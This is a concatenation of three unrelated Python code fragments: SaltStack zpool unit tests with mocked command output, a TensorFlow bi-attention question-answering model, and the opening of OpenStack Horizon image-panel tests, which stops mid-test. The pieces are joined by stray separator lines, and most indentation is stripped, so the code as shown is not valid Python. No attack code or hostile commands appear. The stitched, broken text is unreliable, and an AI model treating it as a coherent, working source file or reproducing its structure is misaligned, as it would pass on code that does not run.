ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict(
[
("labelcleared", False),
(
"error",
"use 'force=True' to override the following"
" error:\n/dev/rdsk/c0t0d0 is a member of exported pool"
' "mypool"',
),
]
)
assert ret == res
@pytest.mark.skip_if_binaries_missing("mkfile", reason="Cannot find mkfile executable")
def test_create_file_vdev_success(utils_patch):
"""
    Tests create_file_vdev on success
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.create_file_vdev("64M", "/vdisks/disk0")
res = OrderedDict([("/vdisks/disk0", "created")])
assert ret == res
@pytest.mark.skip_if_binaries_missing("mkfile", reason="Cannot find mkfile executable")
def test_create_file_vdev_nospace(utils_patch):
"""
Tests create_file_vdev when out of space
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = (
"/vdisks/disk0: initialized 10424320 of 67108864 bytes: No space left on"
" device"
)
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.create_file_vdev("64M", "/vdisks/disk0")
res = OrderedDict(
[
("/vdisks/disk0", "failed"),
(
"error",
OrderedDict(
[
(
"/vdisks/disk0",
" initialized 10424320 of 67108864 bytes: No space"
" left on device",
),
]
),
),
]
)
assert ret == res
def test_export_success(utils_patch):
"""
Tests export
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.export("mypool")
res = OrderedDict([("exported", True)])
assert ret == res
@pytest.mark.slow_test
def test_export_nopool(utils_patch):
"""
Tests export when the pool does not exists
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.export("mypool")
res = OrderedDict(
[("exported", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_import_success(utils_patch):
"""
Tests import
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.import_("mypool")
res = OrderedDict([("imported", True)])
assert ret == res
def test_import_duplicate(utils_patch):
"""
Tests import with already imported pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "\n".join(
[
"cannot import 'mypool': a pool with that name already exists",
"use the form 'zpool import <pool | id> <newpool>' to give it a new"
" name",
]
)
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.import_("mypool")
res = OrderedDict(
[
("imported", False),
(
"error",
"cannot import 'mypool': a pool with that name already"
" exists\nuse the form 'zpool import <pool | id> <newpool>' to"
" give it a new name",
),
]
)
assert ret == res
def test_import_nopool(utils_patch):
"""
Tests import
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot import 'mypool': no such pool available"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.import_("mypool")
res = OrderedDict(
[
("imported", False),
("error", "cannot import 'mypool': no such pool available"),
]
)
assert ret == res
@pytest.mark.slow_test
def test_online_success(utils_patch):
"""
Tests online
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.online("mypool", "/dev/rdsk/c0t0d0")
res = OrderedDict([("onlined", True)])
assert ret == res
def test_online_nodevice(utils_patch):
"""
Tests online
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot online /dev/rdsk/c0t0d1: no such device in pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.online("mypool", "/dev/rdsk/c0t0d1")
res = OrderedDict(
[
("onlined", False),
("error", "cannot online /dev/rdsk/c0t0d1: no such device in pool"),
]
)
assert ret == res
def test_offline_success(utils_patch):
"""
Tests offline
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.offline("mypool", "/dev/rdsk/c0t0d0")
res = OrderedDict([("offlined", True)])
assert ret == res
def test_offline_nodevice(utils_patch):
"""
Tests offline
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot offline /dev/rdsk/c0t0d1: no such device in pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.offline("mypool", "/dev/rdsk/c0t0d1")
res = OrderedDict(
[
("offlined", False),
(
"error",
"cannot offline /dev/rdsk/c0t0d1: no such device in pool",
),
]
)
assert ret == res
def test_offline_noreplica(utils_patch):
"""
Tests offline
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot offline /dev/rdsk/c0t0d1: no valid replicas"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.offline("mypool", "/dev/rdsk/c0t0d1")
res = OrderedDict(
[
("offlined", False),
("error", "cannot offline /dev/rdsk/c0t0d1: no valid replicas"),
]
)
assert ret == res
@pytest.mark.slow_test
def test_reguid_success(utils_patch):
"""
Tests reguid
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reguid("mypool")
res = OrderedDict([("reguided", True)])
assert ret == res
@pytest.mark.slow_test
def test_reguid_nopool(utils_patch):
"""
Tests reguid with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reguid("mypool")
res = OrderedDict(
[("reguided", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_reopen_success(utils_patch):
"""
Tests reopen
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reopen("mypool")
res = OrderedDict([("reopened", True)])
assert ret == res
def test_reopen_nopool(utils_patch):
"""
Tests reopen with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reopen("mypool")
res = OrderedDict(
[("reopened", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
def test_upgrade_success(utils_patch):
"""
Tests upgrade
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.upgrade("mypool")
res = OrderedDict([("upgraded", True)])
assert ret == res
def test_upgrade_nopool(utils_patch):
"""
Tests upgrade with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.upgrade("mypool")
res = OrderedDict(
[("upgraded", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_history_success(utils_patch):
"""
Tests history
"""
ret = {}
ret["stdout"] = "\n".join(
[
"History for 'mypool':",
"2018-01-18.16:56:12 zpool create -f mypool /dev/rdsk/c0t0d0",
"2018-01-19.16:01:55 zpool attach -f mypool /dev/rdsk/c0t0d0"
" /dev/rdsk/c0t0d1",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.history("mypool")
res = OrderedDict(
[
(
"mypool",
OrderedDict(
[
(
"2018-01-18.16:56:12",
"zpool create -f mypool /dev/rdsk/c0t0d0",
),
(
"2018-01-19.16:01:55",
"zpool attach -f mypool /dev/rdsk/c0t0d0"
" /dev/rdsk/c0t0d1",
),
]
),
),
]
)
assert ret == res
def test_history_nopool(utils_patch):
"""
Tests history with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.history("mypool")
res = OrderedDict([("error", "cannot open 'mypool': no such pool")])
assert ret == res
def test_clear_success(utils_patch):
"""
Tests clear
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.clear("mypool")
res = OrderedDict([("cleared", True)])
assert ret == res
def test_clear_nopool(utils_patch):
"""
Tests clear with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.clear("mypool")
    res = OrderedDict(
        [("cleared", False), ("error", "cannot open 'mypool': no such pool")]
    )
    assert ret == res
def test_clear_nodevice(utils_patch):
"""
    Tests clear with a non-existing device
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot clear errors for /dev/rdsk/c0t0d0: no such device in pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.clear("mypool", "/dev/rdsk/c0t0d0")
res = OrderedDict(
[
("cleared", False),
(
"error",
"cannot clear errors for /dev/rdsk/c0t0d0: no such device in"
" pool",
),
]
)
assert ret == res
|
|
import random
import itertools
import numpy as np
import tensorflow as tf
from tensorflow.python.ops.rnn_cell import BasicLSTMCell, GRUCell
from basic_cnn.read_data import DataSet
from basic_cnn.superhighway import SHCell
from my.tensorflow import exp_mask, get_initializer, VERY_SMALL_NUMBER
from my.tensorflow.nn import linear, double_linear_logits, linear_logits, softsel, dropout, get_logits, softmax, \
highway_network, multi_conv1d
from my.tensorflow.rnn import bidirectional_dynamic_rnn, dynamic_rnn
from my.tensorflow.rnn_cell import SwitchableDropoutWrapper, AttentionCell
def bi_attention(config, is_train, h, u, h_mask=None, u_mask=None, scope=None, tensor_dict=None):
"""
h_a:
all u attending on h
choosing an element of h that max-matches u
First creates confusion matrix between h and u
Then take max of the attention weights over u row
    Finally softmax over h
u_a:
each h attending on u
:param h: [N, M, JX, d]
:param u: [N, JQ, d]
:param h_mask: [N, M, JX]
    :param u_mask: [N, JQ]
:param scope:
:return: [N, M, d], [N, M, JX, d]
"""
with tf.variable_scope(scope or "bi_attention"):
N, M, JX, JQ, d = config.batch_size, config.max_num_sents, config.max_sent_size, config.max_ques_size, config.hidden_size
JX = tf.shape(h)[2]
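        # Tile h and u to a common shape [N, M, JX, JQ, d] so every context
        # position can be scored against every question position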
h_aug = tf.tile(tf.expand_dims(h, 3), [1, 1, 1, JQ, 1])
u_aug = tf.tile(tf.expand_dims(tf.expand_dims(u, 1), 1), [1, M, JX, 1, 1])
if h_mask is None:
and_mask = None
else:
h_mask_aug = tf.tile(tf.expand_dims(h_mask, 3), [1, 1, 1, JQ])
u_mask_aug = tf.tile(tf.expand_dims(tf.expand_dims(u_mask, 1), 1), [1, M, JX, 1])
and_mask = h_mask_aug & u_mask_aug
u_logits = get_logits([h_aug, u_aug], None, True, wd=config.wd, mask=and_mask,
is_train=is_train, func=config.logit_func, scope='u_logits') # [N, M, JX, JQ]
u_a = softsel(u_aug, u_logits) # [N, M, JX, d]
if tensor_dict is not None:
# a_h = tf.nn.softmax(h_logits) # [N, M, JX]
a_u = tf.nn.softmax(u_logits) # [N, M, JX, JQ]
# tensor_dict['a_h'] = a_h
tensor_dict['a_u'] = a_u
if config.bi:
h_a = softsel(h, tf.reduce_max(u_logits, 3)) # [N, M, d]
h_a = tf.tile(tf.expand_dims(h_a, 2), [1, 1, JX, 1])
else:
h_a = None
return u_a, h_a
def attention_layer(config, is_train, h, u, h_mask=None, u_mask=None, scope=None, tensor_dict=None):
with tf.variable_scope(scope or "attention_layer"):
u_a, h_a = bi_attention(config, is_train, h, u, h_mask=h_mask, u_mask=u_mask, tensor_dict=tensor_dict)
if config.bi:
            p0 = tf.concat(3, [h, u_a, h * u_a, h * h_a])
else:
            p0 = tf.concat(3, [h, u_a, h * u_a])
return p0
class Model(object):
def __init__(self, config, scope):
self.scope = scope
self.config = config
self.global_step = tf.get_variable('global_step', shape=[], dtype='int32',
initializer=tf.constant_initializer(0), trainable=False)
# Define forward inputs here
N, M, JX, JQ, VW, VC, W = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size, config.max_word_size
self.x = tf.placeholder('int32', [N, M, None], name='x')
self.cx = tf.placeholder('int32', [N, M, None, W], name='cx')
self.x_mask = tf.placeholder('bool', [N, M, None], name='x_mask')
self.q = tf.placeholder('int32', [N, JQ], name='q')
self.cq = tf.placeholder('int32', [N, JQ, W], name='cq')
self.q_mask = tf.placeholder('bool', [N, JQ], name='q_mask')
self.y = tf.placeholder('bool', [N, M, JX], name='y')
self.is_train = tf.placeholder('bool', [], name='is_train')
self.new_emb_mat = tf.placeholder('float', [None, config.word_emb_size], name='new_emb_mat')
# Define misc
self.tensor_dict = {}
# Forward outputs / loss inputs
self.logits = None
self.yp = None
self.var_list = None
# Loss outputs
self.loss = None
self._build_forward()
self._build_loss()
if config.mode == 'train':
self._build_ema()
self.summary = tf.merge_all_summaries()
self.summary = tf.merge_summary(tf.get_collection("summaries", scope=self.scope))
def _build_forward(self):
config = self.config
N, M, JX, JQ, VW, VC, d, W = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size, config.hidden_size, \
config.max_word_size
JX = tf.shape(self.x)[2]
dc, dw, dco = config.char_emb_size, config.word_emb_size, config.char_out_size
with tf.variable_scope("emb"):
with tf.variable_scope("emb_var"), tf.device("/cpu:0"):
char_emb_mat = tf.get_variable("char_emb_mat", shape=[VC, dc], dtype='float')
with tf.variable_scope("char"):
Acx = tf.nn.embedding_lookup(char_emb_mat, self.cx) # [N, M, JX, W, dc]
Acq = tf.nn.embedding_lookup(char_emb_mat, self.cq) # [N, JQ, W, dc]
Acx = tf.reshape(Acx, [-1, JX, W, dc])
Acq = tf.reshape(Acq, [-1, JQ, W, dc])
filter_sizes = list(map(int, config.out_channel_dims.split(',')))
heights = list(map(int, config.filter_heights.split(',')))
assert sum(filter_sizes) == dco
with tf.variable_scope("conv"):
xx = multi_conv1d(Acx, filter_sizes, heights, "VALID", self.is_train, config.keep_prob, scope="xx")
if config.share_cnn_weights:
tf.get_variable_scope().reuse_variables()
qq = multi_conv1d(Acq, filter_sizes, heights, "VALID", self.is_train, config.keep_prob, scope="xx")
else:
qq = multi_conv1d(Acq, filter_sizes, heights, "VALID", self.is_train, config.keep_prob, scope="qq")
xx = tf.reshape(xx, [-1, M, JX, dco])
qq = tf.reshape(qq, [-1, JQ, dco])
if config.use_word_emb:
with tf.variable_scope("emb_var"), tf.device("/cpu:0"):
if config.mode == 'train':
word_emb_mat = tf.get_variable("word_emb_mat", dtype='float', shape=[VW, dw], initializer=get_initializer(config.emb_mat))
else:
word_emb_mat = tf.get_variable("word_emb_mat", shape=[VW, dw], dtype='float')
if config.use_glove_for_unk:
word_emb_mat = tf.concat(0, [word_emb_mat, self.new_emb_mat])
with tf.name_scope("word"):
Ax = tf.nn.embedding_lookup(word_emb_mat, self.x) # [N, M, JX, d]
Aq = tf.nn.embedding_lookup(word_emb_mat, self.q) # [N, JQ, d]
self.tensor_dict['x'] = Ax
self.tensor_dict['q'] = Aq
xx = tf.concat(3, [xx, Ax]) # [N, M, JX, di]
qq = tf.concat(2, [qq, Aq]) # [N, JQ, di]
# highway network
with tf.variable_scope("highway"):
xx = highway_network(xx, config.highway_num_layers, True, wd=config.wd, is_train=self.is_train)
tf.get_variable_scope().reuse_variables()
qq = highway_network(qq, config.highway_num_layers, True, wd=config.wd, is_train=self.is_train)
self.tensor_dict['xx'] = xx
self.tensor_dict['qq'] = qq
cell = BasicLSTMCell(d, state_is_tuple=True)
d_cell = SwitchableDropoutWrapper(cell, self.is_train, input_keep_prob=config.input_keep_prob)
x_len = tf.reduce_sum(tf.cast(self.x_mask, 'int32'), 2) # [N, M]
q_len = tf.reduce_sum(tf.cast(self.q_mask, 'int32'), 1) # [N]
with tf.variable_scope("prepro"):
(fw_u, bw_u), ((_, fw_u_f), (_, bw_u_f)) = bidirectional_dynamic_rnn(d_cell, d_cell, qq, q_len, dtype='float', scope='u1') # [N, J, d], [N, d]
u = tf.concat(2, [fw_u, bw_u])
if config.two_prepro_layers:
(fw_u, bw_u), ((_, fw_u_f), (_, bw_u_f)) = bidirectional_dynamic_rnn(d_cell, d_cell, u, q_len, dtype='float', scope='u2') # [N, J, d], [N, d]
u = tf.concat(2, [fw_u, bw_u])
if config.share_lstm_weights:
tf.get_variable_scope().reuse_variables()
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, xx, x_len, dtype='float', scope='u1') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
if config.two_prepro_layers:
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, h, x_len, dtype='float', scope='u2') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
else:
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, xx, x_len, dtype='float', scope='h1') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
if config.two_prepro_layers:
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, h, x_len, dtype='float', scope='h2') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
self.tensor_dict['u'] = u
self.tensor_dict['h'] = h
with tf.variable_scope("main"):
p0 = attention_layer(config, self.is_train, h, u, h_mask=self.x_mask, u_mask=self.q_mask, scope="p0", tensor_dict=self.tensor_dict)
(fw_g0, bw_g0), _ = bidirectional_dynamic_rnn(d_cell, d_cell, p0, x_len, dtype='float', scope='g0') # [N, M, JX, 2d]
g0 = tf.concat(3, [fw_g0, bw_g0])
# p1 = attention_layer(config, self.is_train, g0, u, h_mask=self.x_mask, u_mask=self.q_mask, scope="p1")
(fw_g1, bw_g1), _ = bidirectional_dynamic_rnn(d_cell, d_cell, g0, x_len, dtype='float', scope='g1') # [N, M, JX, 2d]
g1 = tf.concat(3, [fw_g1, bw_g1])
# logits = u_logits(config, self.is_train, g1, u, h_mask=self.x_mask, u_mask=self.q_mask, scope="logits")
# [N, M, JX]
logits = get_logits([g1, p0], d, True, wd=config.wd, input_keep_prob=config.input_keep_prob, mask=self.x_mask, is_train=self.is_train, func=config.answer_func, scope='logits1')
a1i = softsel(tf.reshape(g1, [N, M*JX, 2*d]), tf.reshape(logits, [N, M*JX]))
if config.feed_gt:
logy = tf.log(tf.cast(self.y, 'float') + VERY_SMALL_NUMBER)
logits = tf.cond(self.is_train, lambda: logy, lambda: logits)
if config.feed_hard:
hard_yp = tf.argmax(tf.reshape(logits, [N, M*JX]), 1)
hard_logits = tf.reshape(tf.one_hot(hard_yp, M*JX), [N, M, JX]) # [N, M, JX]
logits = tf.cond(self.is_train, lambda: logits, lambda: hard_logits)
flat_logits = tf.reshape(logits, [-1, M * JX])
flat_yp = tf.nn.softmax(flat_logits) # [-1, M*JX]
yp = tf.reshape(flat_yp, [-1, M, JX])
self.tensor_dict['g1'] = g1
self.logits = flat_logits
self.yp = yp
def _build_loss(self):
config = self.config
N, M, JX, JQ, VW, VC = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size
JX = tf.shape(self.x)[2]
loss_mask = tf.reduce_max(tf.cast(self.q_mask, 'float'), 1)
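        # losses below is the negative log of the probability mass that yp assigns
        # to the gold answer positions; VERY_SMALL_NUMBER guards against log(0).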
losses = -tf.log(tf.reduce_sum(self.yp * tf.cast(self.y, 'float'), [1, 2]) + VERY_SMALL_NUMBER)
ce_loss = tf.reduce_mean(loss_mask * losses)
tf.add_to_collection('losses', ce_loss)
self.loss = tf.add_n(tf.get_collection('losses', scope=self.scope), name='loss')
tf.scalar_summary(self.loss.op.name, self.loss)
tf.add_to_collection('ema/scalar', self.loss)
def _build_ema(self):
ema = tf.train.ExponentialMovingAverage(self.config.decay)
ema_op = ema.apply(tf.get_collection("ema/scalar", scope=self.scope) + tf.get_collection("ema/histogram", scope=self.scope))
for var in tf.get_collection("ema/scalar", scope=self.scope):
ema_var = ema.average(var)
tf.scalar_summary(ema_var.op.name, ema_var)
for var in tf.get_collection("ema/histogram", scope=self.scope):
ema_var = ema.average(var)
tf.histogram_summary(ema_var.op.name, ema_var)
with tf.control_dependencies([ema_op]):
self.loss = tf.identity(self.loss)
def get_loss(self):
return self.loss
def get_global_step(self):
return self.global_step
def get_var_list(self):
return self.var_list
def get_feed_dict(self, batch, is_train, supervised=True):
assert isinstance(batch, DataSet)
config = self.config
N, M, JX, JQ, VW, VC, d, W = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size, config.hidden_size, config.max_word_size
feed_dict = {}
if config.len_opt:
"""
            Note that this optimization results in variable GPU RAM usage
            (i.e. it can cause OOM in the middle of training).
            First train without len_opt to make sure there is no OOM, then enable len_opt.
"""
if sum(len(para) for para in batch.data['x']) == 0:
new_JX = 1
else:
new_JX = max(len(para) for para in batch.data['x'])
JX = min(JX, new_JX)
# print(JX)
x = np.zeros([N, M, JX], dtype='int32')
cx = np.zeros([N, M, JX, W], dtype='int32')
x_mask = np.zeros([N, M, JX], dtype='bool')
q = np.zeros([N, JQ], dtype='int32')
cq = np.zeros([N, JQ, W], dtype='int32')
q_mask = np.zeros([N, JQ], dtype='bool')
feed_dict[self.x] = x
feed_dict[self.x_mask] = x_mask
feed_dict[self.cx] = cx
feed_dict[self.q] = q
feed_dict[self.cq] = cq
feed_dict[self.q_mask] = q_mask
feed_dict[self.is_train] = is_train
if config.use_glove_for_unk:
feed_dict[self.new_emb_mat] = batch.shared['new_emb_mat']
X = batch.data['x']
CX = batch.data['cx']
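        # _get_word below tries the exact token, then its lowercase, capitalized and
        # uppercase forms in word2idx; with config.use_glove_for_unk it falls back to
        # the extra GloVe vocabulary (indices offset by len(word2idx)). Tokens that
        # start with "@" map to index 2, and anything still unmatched maps to index 1.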
def _get_word(word):
if word.startswith("@"):
return 2
d = batch.shared['word2idx']
for each in (word, word.lower(), word.capitalize(), word.upper()):
if each in d:
return d[each]
if config.use_glove_for_unk:
d2 = batch.shared['new_word2idx']
for each in (word, word.lower(), word.capitalize(), word.upper()):
if each in d2:
return d2[each] + len(d)
return 1
def _get_char(char):
d = batch.shared['char2idx']
if char in d:
return d[char]
return 1
if supervised:
y = np.zeros([N, M, JX], dtype='int32')
feed_dict[self.y] = y
for i, (xi, yi) in enumerate(zip(batch.data['x'], batch.data['y'])):
count = 0
for j, xij in enumerate(xi):
for k, xijk in enumerate(xij):
if xijk == yi:
y[i, j, k] = True
count += 1
assert count > 0
for i, xi in enumerate(X):
for j, xij in enumerate(xi):
for k, xijk in enumerate(xij):
each = _get_word(xijk)
x[i, j, k] = each
x_mask[i, j, k] = True
for i, cxi in enumerate(CX):
for j, cxij in enumerate(cxi):
for k, cxijk in enumerate(cxij):
for l, cxijkl in enumerate(cxijk):
cx[i, j, k, l] = _get_char(cxijkl)
if l + 1 == config.max_word_size:
break
for i, qi in enumerate(batch.data['q']):
for j, qij in enumerate(qi):
q[i, j] = _get_word(qij)
q_mask[i, j] = True
for i, cqi in enumerate(batch.data['cq']):
for j, cqij in enumerate(cqi):
for k, cqijk in enumerate(cqij):
cq[i, j, k] = _get_char(cqijk)
if k + 1 == config.max_word_size:
break
return feed_dict
def get_multi_gpu_models(config):
models = []
for gpu_idx in range(config.num_gpus):
with tf.name_scope("model_{}".format(gpu_idx)) as scope, tf.device("/gpu:{}".format(gpu_idx)):
model = Model(config, scope)
tf.get_variable_scope().reuse_variables()
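            # After the first tower is built, reuse_variables() makes every later
            # tower share that first model's parameters instead of creating new ones.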
models.append(model)
return models
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from socket import timeout as socket_timeout
import tempfile
import unittest
from django.urls import reverse
import mock
import six
from horizon import exceptions
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.images import utils
from openstack_dashboard.test import helpers as test
INDEX_TEMPLATE = 'horizon/common/_data_table_view.html'
INDEX_URL = reverse('horizon:project:images:index')
CREATE_URL = reverse('horizon:project:images:images:create')
class BaseImagesTestCase(test.TestCase):
def setUp(self):
super(BaseImagesTestCase, self).setUp()
        self.patcher = mock.patch.object(api.glance, 'image_list_detailed')
        self.mock_image_list = self.patcher.start()
        self.addCleanup(self.patcher.stop)
class ImagesAndSnapshotsTests(BaseImagesTestCase):
def test_index(self):
images = self.images.list()
self.mock_image_list.return_value = [images, False, False]
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
self.assertContains(res, 'help_text="Deleted images'
' are not recoverable."')
self.assertIn('images_table', res.context)
images_table = res.context['images_table']
images = images_table.data
self.assertEqual(len(images), 10)
row_actions = images_table.get_row_actions(images[0])
self.assertEqual(len(row_actions), 5)
row_actions = images_table.get_row_actions(images[1])
self.assertEqual(len(row_actions), 3)
self.assertNotIn('delete_image',
[a.name for a in row_actions])
row_actions = images_table.get_row_actions(images[2])
self.assertEqual(len(row_actions), 4)
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
def test_index_no_images(self):
self.mock_image_list.return_value = [(), False, False]
res = self.client.get(INDEX_URL)
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
self.assertContains(res, 'No items to display')
def test_index_error(self):
self.mock_image_list.side_effect = self.exceptions.glance
res = self.client.get(INDEX_URL)
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
def test_snapshot_actions(self):
snapshots = self.snapshots.list()
self.mock_image_list.return_value = [snapshots, False, False]
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
self.assertIn('images_table', res.context)
snaps = res.context['images_table']
self.assertEqual(len(snaps.get_rows()), 4)
row_actions = snaps.get_row_actions(snaps.data[0])
# first instance - status active, owned
self.assertEqual(len(row_actions), 5)
self.assertEqual(row_actions[0].verbose_name, u"Launch")
